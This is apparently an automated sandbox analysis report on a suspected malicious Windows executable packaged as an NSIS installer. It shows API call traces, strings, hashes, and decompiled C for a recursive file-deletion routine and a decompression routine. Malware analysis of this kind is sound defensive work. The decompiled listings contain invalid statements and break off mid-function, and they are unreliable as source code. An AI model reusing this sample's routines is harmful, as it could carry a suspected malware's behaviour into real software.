                      • SHGetFileInfoA.SHELL32(0041F450,00000000,?,00000160,00000000,00000008), ref: 0040327E
                        • Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,jefgbrzfgglybaslbprz Setup,NSIS Error), ref: 00405A92
                      • GetCommandLineA.KERNEL32(jefgbrzfgglybaslbprz Setup,NSIS Error), ref: 00403293
                      • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,00000000), ref: 004032A6
                      • CharNextA.USER32(00000000,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,00000020), ref: 004032D1
                      • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403364
                      • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403379
                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403385
                      • DeleteFileA.KERNELBASE(1033), ref: 00403398
                      • OleUninitialize.OLE32(00000000), ref: 00403416
                      • ExitProcess.KERNEL32 ref: 00403436
                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,00000000,00000000), ref: 00403442
                      • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,00000000,00000000), ref: 0040344E
                      • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040345A
                      • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403461
                      • DeleteFileA.KERNEL32(0041F050,0041F050,?,00424000,?), ref: 004034AB
                      • CopyFileA.KERNEL32(C:\Users\user\Desktop\nji3Lg1ot6.exe,0041F050,00000001), ref: 004034BF
                      • CloseHandle.KERNEL32(00000000,0041F050,0041F050,?,0041F050,00000000), ref: 004034EC
                      • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403541
                      • ExitWindowsEx.USER32(00000002,00000000), ref: 0040357D
                      • ExitProcess.KERNEL32 ref: 004035A0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                      • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\nji3Lg1ot6.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\nji3Lg1ot6.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$hM$jefgbrzfgglybaslbprz Setup$~nsu.tmp
                      • API String ID: 2278157092-535596060
                      • Opcode ID: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
                      • Instruction ID: b5e3cabad0cbadbc416d8838d891dc98190303aa4ff7e7c7b73425e0a697763a
                      • Opcode Fuzzy Hash: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
                      • Instruction Fuzzy Hash: FF91C170A08351BED7216F619C89B2B7EACAB44306F04457BF941B62D2C77C9E058B6E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004053AA, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 248 4053aa-4053c5 call 405659 251 4053c7-4053d9 DeleteFileA 248->251 252 4053de-4053e8 248->252 255 405572-405575 251->255 253 4053ea-4053ec 252->253 254 4053fc-40540a call 405a85 252->254 256 4053f2-4053f6 253->256 257 40551d-405523 253->257 261 405419-40541a call 4055bf 254->261 262 40540c-405417 lstrcatA 254->262 256->254 256->257 257->255 260 405525-405528 257->260 263 405532-40553a call 405d7c 260->263 264 40552a-405530 260->264 266 40541f-405422 261->266 262->266 263->255 271 40553c-405551 call 405578 call 40573d RemoveDirectoryA 263->271 264->255 269 405424-40542b 266->269 270 40542d-405433 lstrcatA 266->270 269->270 272 405438-405456 lstrlenA FindFirstFileA 269->272 270->272 287 405553-405557 271->287 288 40556a-40556d call 404e23 271->288 274 405513-405517 272->274 275 40545c-405473 call 4055a3 272->275 274->257 277 405519 274->277 282 405475-405479 275->282 283 40547e-405481 275->283 277->257 282->283 284 40547b 282->284 285 405483-405488 283->285 286 405494-4054a2 call 405a85 283->286 284->283 289 4054f2-405504 FindNextFileA 285->289 290 40548a-40548c 285->290 298 4054a4-4054ac 286->298 299 4054b9-4054c8 call 40573d DeleteFileA 286->299 287->264 292 405559-405568 call 404e23 call 4057d3 287->292 288->255 289->275 296 40550a-40550d FindClose 289->296 290->286 294 40548e-405492 290->294 292->255 294->286 294->289 296->274 298->289 301 4054ae-4054b7 call 4053aa 298->301 308 4054ea-4054ed call 404e23 299->308 309 4054ca-4054ce 299->309 301->289 308->289 310 4054d0-4054e0 call 404e23 call 4057d3 309->310 311 4054e2-4054e8 309->311 310->289 311->289
                      C-Code - Quality: 94%
                      			E004053AA(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E00405659(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x423f28 =  *0x423f28 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405A85(0x4214a0, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E004055BF(_t72);
					} else {
						lstrcatA(0x4214a0, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x40900c);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x4214a0,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E004055A3( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405A85(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E0040573D(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404E23(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423f28 =  *0x423f28 + 1;
										} else {
											E00404E23(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E004057D3();
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004053AA(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x4214a0 - 0x5c;
					if( *0x4214a0 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405D7C(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E00405578(_t72);
							E0040573D(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404E23(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404E23(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E004057D3();
						}
						L33:
						 *0x423f28 =  *0x423f28 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                      0x004053b5
                      0x004053b9
                      0x004053c2
                      0x004053c5
                      0x004053c8
                      0x004053d0
                      0x004053d2
                      0x004053d3
                      0x00000000
                      0x004053d3
                      0x004053e2
                      0x004053e2
                      0x004053e5
                      0x004053e8
                      0x004053fc
                      0x00405403
                      0x00405408
                      0x0040540a
                      0x0040541a
                      0x0040540c
                      0x00405412
                      0x00405412
                      0x0040541f
                      0x00405422
                      0x0040542d
                      0x00405433
                      0x00405438
                      0x00405448
                      0x0040544a
                      0x00405450
                      0x00405453
                      0x00405456
                      0x00405513
                      0x00405513
                      0x00405517
                      0x00405519
                      0x00405519
                      0x00405519
                      0x00405519
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040545c
                      0x0040545c
                      0x00405465
                      0x0040546b
                      0x00405470
                      0x00405473
                      0x00405475
                      0x00405479
                      0x0040547b
                      0x0040547b
                      0x00405479
                      0x0040547e
                      0x00405481
                      0x00405494
                      0x00405496
                      0x0040549b
                      0x004054a2
                      0x004054ba
                      0x004054c0
                      0x004054c6
                      0x004054c8
                      0x004054ed
                      0x004054ca
                      0x004054ca
                      0x004054ce
                      0x004054e2
                      0x004054d0
                      0x004054d3
                      0x004054d8
                      0x004054da
                      0x004054db
                      0x004054db
                      0x004054ce
                      0x004054a4
                      0x004054aa
                      0x004054ac
                      0x004054b2
                      0x004054b2
                      0x004054ac
                      0x00000000
                      0x004054a2
                      0x00405483
                      0x00405486
                      0x00405488
                      0x00000000
                      0x00000000
                      0x0040548a
                      0x0040548c
                      0x00000000
                      0x00000000
                      0x0040548e
                      0x00405492
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004054f2
                      0x004054fc
                      0x00405502
                      0x00405502
                      0x0040550d
                      0x00000000
                      0x0040550d
                      0x00405424
                      0x0040542b
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004053ea
                      0x004053ea
                      0x004053ec
                      0x0040551d
                      0x00405520
                      0x00405523
                      0x00405575
                      0x00405575
                      0x00405575
                      0x00405525
                      0x00405528
                      0x00405533
                      0x00405538
                      0x0040553a
                      0x00000000
                      0x00000000
                      0x0040553d
                      0x00405543
                      0x00405549
                      0x0040554f
                      0x00405551
                      0x00000000
                      0x0040556d
                      0x00405553
                      0x00405557
                      0x00000000
                      0x00000000
                      0x0040555c
                      0x00405561
                      0x00405562
                      0x00000000
                      0x00405563
                      0x0040552a
                      0x0040552a
                      0x00000000
                      0x0040552a
                      0x004053f2
                      0x004053f6
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004053f6

                      APIs
                      • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,74E5F560), ref: 004053C8
                      • lstrcatA.KERNEL32(004214A0,\*.*,004214A0,?,00000000,?,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,74E5F560), ref: 00405412
                      • lstrcatA.KERNEL32(?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,74E5F560), ref: 00405433
                      • lstrlenA.KERNEL32(?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,74E5F560), ref: 00405439
                      • FindFirstFileA.KERNEL32(004214A0,?,?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,74E5F560), ref: 0040544A
                      • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004054FC
                      • FindClose.KERNEL32(?), ref: 0040550D
                      Strings
                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004053AA
                      • "C:\Users\user\Desktop\nji3Lg1ot6.exe" , xrefs: 004053B4
                      • \*.*, xrefs: 0040540C
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                      • String ID: "C:\Users\user\Desktop\nji3Lg1ot6.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                      • API String ID: 2035342205-2832306324
                      • Opcode ID: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
                      • Instruction ID: 0322a8429cd808b8a7b2d486838befd4e4df4ca31dedcf7a9ac14dfd5c4716bd
                      • Opcode Fuzzy Hash: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
                      • Instruction Fuzzy Hash: 2851CE30904A58BACB21AB219C85BFF3A78DF42719F14817BF901751D2CB7C4982DE6E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040604C, Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 520 40604c-406051 521 4060c2-4060e0 520->521 522 406053-406082 520->522 523 4066b8-4066cd 521->523 524 406084-406087 522->524 525 406089-40608d 522->525 526 4066e7-4066fd 523->526 527 4066cf-4066e5 523->527 528 406099-40609c 524->528 529 406095 525->529 530 40608f-406093 525->530 531 406700-406707 526->531 527->531 532 4060ba-4060bd 528->532 533 40609e-4060a7 528->533 529->528 530->528 535 406709-40670d 531->535 536 40672e-40673a 531->536 534 40628f-4062ad 532->534 537 4060a9 533->537 538 4060ac-4060b8 533->538 543 4062c5-4062d7 534->543 544 4062af-4062c3 534->544 540 406713-40672b 535->540 541 4068bc-4068c6 535->541 546 405ed0-405ed9 536->546 537->538 539 406122-406150 538->539 547 406152-40616a 539->547 548 40616c-406186 539->548 540->536 545 4068d2-4068e5 541->545 549 4062da-4062e4 543->549 544->549 553 4068ea-4068ee 545->553 550 4068e7 546->550 551 405edf 546->551 552 406189-406193 547->552 548->552 554 4062e6 549->554 555 406287-40628d 549->555 550->553 556 405ee6-405eea 551->556 557 406026-406047 551->557 558 405f8b-405f8f 551->558 559 405ffb-405fff 551->559 561 406199 552->561 562 40610a-406110 552->562 571 40626c-406284 554->571 572 40686e-406878 554->572 555->534 560 40622b-406235 555->560 556->545 564 405ef0-405efd 556->564 557->523 573 405f95-405fae 558->573 574 40683b-406845 558->574 565 406005-406019 559->565 566 40684a-406854 559->566 567 40687a-406884 560->567 568 40623b-406404 560->568 577 406856-406860 561->577 578 4060ef-406107 561->578 569 4061c3-4061c9 562->569 570 406116-40611c 562->570 564->550 576 405f03-405f49 564->576 579 40601c-406024 565->579 566->545 567->545 568->546 581 406227 569->581 583 4061cb-4061e9 569->583 570->539 570->581 571->555 572->545 582 405fb1-405fb5 573->582 574->545 586 405f71-405f73 576->586 587 405f4b-405f4f 576->587 577->545 578->562 579->557 579->559 581->560 582->558 588 405fb7-405fbd 582->588 584 406201-406213 583->584 585 4061eb-4061ff 583->585 589 406216-406220 584->589 585->589 592 405f81-405f89 586->592 593 405f75-405f7f 586->593 590 405f51-405f54 GlobalFree 587->590 591 405f5a-405f68 GlobalAlloc 587->591 594 405fe7-405ff9 588->594 595 405fbf-405fc6 588->595 589->569 598 406222 589->598 590->591 591->550 599 405f6e 591->599 592->582 593->592 593->593 594->579 596 405fd1-405fe1 GlobalAlloc 595->596 597 405fc8-405fcb GlobalFree 595->597 596->550 596->594 597->596 601 406862-40686c 598->601 602 4061a8-4061c0 598->602 599->586 601->545 602->569
                      C-Code - Quality: 98%
                      			E0040604C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
